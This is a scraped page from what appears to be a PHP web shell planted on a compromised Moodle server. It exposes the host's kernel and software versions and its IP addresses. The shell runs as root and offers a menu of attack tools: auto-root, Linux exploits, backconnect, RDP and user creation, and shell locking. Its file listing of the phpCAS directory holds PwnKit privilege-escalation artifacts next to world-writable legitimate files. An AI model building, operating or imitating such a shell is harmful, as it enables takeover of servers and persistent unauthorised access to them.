Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
auth /
cas /
CAS /
CAS /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Languages
[ DIR ]
drwxrwxrwx
PGTStorage
[ DIR ]
drwxrwxrwx
ProxiedService
[ DIR ]
drwxrwxrwx
ProxyChain
[ DIR ]
drwxrwxrwx
Request
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
AuthenticationException.php
4.29
KB
-rwxrwxrwx
Autoload.php
2.57
KB
-rwxrwxrwx
Client.php
138.17
KB
-rwxrwxrwx
CookieJar.php
11.96
KB
-rwxrwxrwx
Exception.php
1.94
KB
-rwxrwxrwx
GracefullTerminationException....
2.86
KB
-rwxrwxrwx
InvalidArgumentException.php
1.48
KB
-rwxrwxrwx
OutOfSequenceBeforeAuthenticat...
1.88
KB
-rwxrwxrwx
OutOfSequenceBeforeClientExcep...
1.93
KB
-rwxrwxrwx
OutOfSequenceBeforeProxyExcept...
1.89
KB
-rwxrwxrwx
OutOfSequenceException.php
1.65
KB
-rwxrwxrwx
ProxiedService.php
2.41
KB
-rwxrwxrwx
ProxyChain.php
4.25
KB
-rwxrwxrwx
ProxyTicketException.php
2.26
KB
-rwxrwxrwx
TypeMismatchException.php
2.25
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Autoload.php
<?php /** * Autoloader Class * * PHP Version 5 * * @file CAS/Autoload.php * @category Authentication * @package SimpleCAS * @author Brett Bieber <brett.bieber@gmail.com> * @copyright 2008 Regents of the University of Nebraska * @license http://www1.unl.edu/wdn/wiki/Software_License BSD License * @link http://code.google.com/p/simplecas/ **/ /** * Autoload a class * * @param string $class Classname to load * * @return bool */ function CAS_autoload($class) { // Static to hold the Include Path to CAS static $include_path; // Check only for CAS classes if (substr($class, 0, 4) !== 'CAS_') { return false; } // Setup the include path if it's not already set from a previous call if (empty($include_path)) { $include_path = array(dirname(dirname(__FILE__)), dirname(dirname(__FILE__)) . '/../test/' ); } // Declare local variable to store the expected full path to the file foreach ($include_path as $path) { $file_path = $path . '/' . str_replace('_', '/', $class) . '.php'; $fp = @fopen($file_path, 'r', true); if ($fp) { fclose($fp); include $file_path; if (!class_exists($class, false) && !interface_exists($class, false)) { die( new Exception( 'Class ' . $class . ' was not present in ' . $file_path . ' [CAS_autoload]' ) ); } return true; } } $e = new Exception( 'Class ' . $class . ' could not be loaded from ' . $file_path . ', file does not exist (Path="' . implode(':', $include_path) .'") [CAS_autoload]' ); $trace = $e->getTrace(); if (isset($trace[2]) && isset($trace[2]['function']) && in_array($trace[2]['function'], array('class_exists', 'interface_exists')) ) { return false; } if (isset($trace[1]) && isset($trace[1]['function']) && in_array($trace[1]['function'], array('class_exists', 'interface_exists')) ) { return false; } die ((string) $e); } // set up __autoload if (!(spl_autoload_functions()) || !in_array('CAS_autoload', spl_autoload_functions()) ) { spl_autoload_register('CAS_autoload'); if (function_exists('__autoload') && !in_array('__autoload', spl_autoload_functions()) ) { // __autoload() was being used, but now would be ignored, add // it to the autoload stack spl_autoload_register('__autoload'); } } ?>
Close